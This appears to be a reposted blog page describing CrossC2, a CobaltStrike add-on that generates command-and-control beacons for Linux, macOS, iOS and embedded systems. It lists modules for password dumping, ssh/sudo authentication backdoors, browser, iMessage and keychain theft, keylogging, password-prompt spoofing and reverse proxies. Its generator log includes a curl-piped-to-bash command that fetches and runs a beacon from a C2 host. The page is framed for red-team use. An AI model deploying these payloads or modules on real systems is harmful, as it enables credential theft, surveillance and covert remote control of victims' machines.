Hacking

CrossC2 – Generate CobaltStrike’s Cross-Platform Payload

r00tBy 1337 views
1

A security framework for enterprises and Red Team personnel, supports CobaltStrike’s penetration testing of other platforms (Linux / MacOS / …), supports custom modules, and includes some commonly used penetration modules.

Only for internal use by enterprises and organizations, this framework has a certain degree of instability. Non-professionals are not allowed to use it. Anyone shall not use it for illegal purposes and profitability. Besides that, publishing unauthorized modified version is also prohibited, or otherwise bear legal responsibilities.

WindowsLinuxMacOSiOSAndroidEmbedded
Run Env (x86)
Run Env (x64)
gen beacon (x86)
gen beacon (x64)
gen beacon (armv7)
gen beacon (arm64)
gen beacon (mips[el])

Restricted description:

  • CobaltStrike: currently only supports the last version of cs 3.14(bug fixs).
  • Linux: For particularly old systems, you can choose “Linux-GLIBC” option in cna (around 2010)
  • MacOS: Latest systems only support 64-bit programs
  • iOS: sandbox, restricted cmd
  • Embedded: only *nix
  • ⍻ : Loader is still in progress

Install & Usage

Download:

  • CrossC2.cna
  • genCrossC2 (If it is a Windows system, download genCrossC2.Win.exe)
  1. choose Script Manager,add CrossC2.cna (If successfully installed, the menu bar will have an additional item CrossC2)
  2. Modify the genCC2 path in the CrossC2.cna script to the real path
77:    $genCC2 = "/xxx/xx/xx/genCrossC2.MacOS";  # <-------- fix

Create listener and copy key:

For some reasons, only HTTPS beacon is currently supported.

Copy .cobaltstrike.beacon_keys from the cs directory on the server to the local directory.

Reference documents:  Wiki

Module: API introduction  Wiki

It adopts the method of loading memory without landing, and supports dynamic libraries (.so/.dylib) and executable files (ELF/MachO). ⚠️: Although the file is loaded directly from memory, the process can be viewed in ps when the executable file is passed in, but the process name can be customized.

The type of output information can be freely specified at the time of execution. The return type has been predetermined and can be docked with the native return data type of CS. ⚠️: For special data types, such as passwords, port scan results, etc., please refer to the information returned by the native function of cs, which will be matched according to the regular.

  1. Password dump module: cc2_mimipenguin uses the open source project MimiPenguin2.0, see CrossC2Kit/ mimipenguin/mimipenguin.cna
  2. Authentication backdoor modules: cc2_auth, cc2_ssh sudo / su / passwd and other authentication backdoors, ssh is connected and the credentials to connect to other hosts will be recorded.
  3. Information collection modules: cc2_safari_dump, cc2_chrome_dump, cc2_iMessage_dump, cc2_keychain_dump access records of common browsers, as well as iMessage chat content and authentication credentials saved in the keychain will be obtained.
  4. Traffic proxy module: cc2_frp supports fast TCP/KCP(UDP) reverse socks5 encrypted traffic proxy.
  5. Keylogger module: cc2_keylogger records user’s keyboard input.
  6. Network detection module: cc2_portscan, cc2_serverscan for port scanning and service version scanning.
  7. Privilege promotion module: cc2_prompt_spoof induces deception to obtain user account password.
  8. Task management module: cc2_job manages the modules running in memory.

Custom communication protocol: API introduction  Wiki

Can more easily realize C2Profile configuration and custom communication protocol TCP / UDP and so on.

Lateral movement: Usage  Wiki

  1. 生成 Linux-bind / MacOS-bind 类型的beacon
  2. 内网中的目标运行 ./MacOS-bind.beacon <port> 开启服务
  3. 在网络联通的session中运行 connect <targetIP>:<port>

cna plugin way

Menu Bar: CrossC2 -> CrossC2 Payload Generator -> genCrossC2

Can be configured in the pop-up dialog:
1. Select beacon_key (the path cannot contain spaces, the problem is not solved yet)
2. A dynamic library of custom communication protocols that needs to be bound to beacon
3. Payload type (Staged generated shellcode requires stagerServer)

The information status will be prompted in the event interface during generation

05/01 23:31:03 *** /mnt/cc2/genCrossC2.MacOS 172.16.251.1 5555 /tmp/beacon_keys null MacOS x64 /tmp/CrossC2-test
05/01 23:31:06 *** genCrossC2 beacon -> *[success] :	Packed 1532232 byte.
05/01 23:31:07 *** hook hosted CrossC2 beacon MacOS x64 @ http://172.16.251.1:55413/iqEBVKwHoZ
05/01 23:31:07 *** hook hosted Script Unix Web Delivery (curl) @ http://172.16.251.1:55413/a
05/01 23:31:07 *** CrossC2 MacOS x64:   curl -A o -o- -L http://172.16.251.1:55413/a | bash -s

Coming soon

  1. Rich C2Profile support ✔︎ (Choose custom HTTP module when CNA generates beaocn)
  2. Staged Type Shellcode Generation ✔︎ (Only Linux is temporarily supported, and stagerServer needs to be started on the server)
  3. http-proxy (auth) & socks proxy back connection support
  4. Proxy-Pivots ✔︎ (Temporarily adopt the method of connecting back to socks proxy)
  5. node beacon? (Single node type, can host other beacon without relying on teamserver)

Examples

Mobile

MacOS & Linux

CustomExtension

Develop dynamic libraries and customize data return types, such as implementing some built-in functions.

keystrokes

credentials

portscan

Github

discover: A Custom Bash Scripts Used To Perform Pentesting Tasks With Metasploit

Previous article

sysPass – Systems Password Manager

Next article

You may also like

1 Comment

  1. Eⲭcellent article. I definitely ⅼove this
    website. Thanks!

    Reply

Leave a reply

Your email address will not be published. Required fields are marked *

More in Hacking